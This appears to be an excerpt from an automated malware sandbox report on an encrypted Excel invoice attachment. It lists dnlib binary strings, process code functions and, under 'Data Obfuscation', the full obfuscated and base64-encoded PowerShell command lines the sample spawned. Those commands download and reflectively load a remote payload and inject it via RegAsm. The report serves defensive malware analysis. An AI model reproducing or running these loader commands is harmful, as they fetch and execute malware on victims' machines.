                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000010.00000002.486203439.0000000000329000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: 33930000.0.drInitial sample: OLE indicators vbamacros = False
                    Source: invoice_45009.xlsInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,19_2_0041CBE1
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 11_2_00588C52 push edi; retf 0031h11_2_00588C54
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 11_2_00588F7B push edi; retn 0031h11_2_00588FA4
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 11_2_0058CA14 pushad ; retf 0058h11_2_0058CA15
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 11_2_005805B1 push ebp; retf 11_2_005805B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00457186 push ecx; ret 19_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0045E55D push esi; ret 19_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00457AA8 push eax; ret 19_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00434EB6 push ecx; ret 19_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_10002806 push ecx; ret 19_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044693D push ecx; ret 20_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044DB70 push eax; ret 20_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044DB70 push eax; ret 20_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00451D54 push eax; ret 20_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B090 push eax; ret 21_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B090 push eax; ret 21_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00451D34 push eax; ret 21_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00444E71 push ecx; ret 21_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00414060 push eax; ret 22_2_00414074
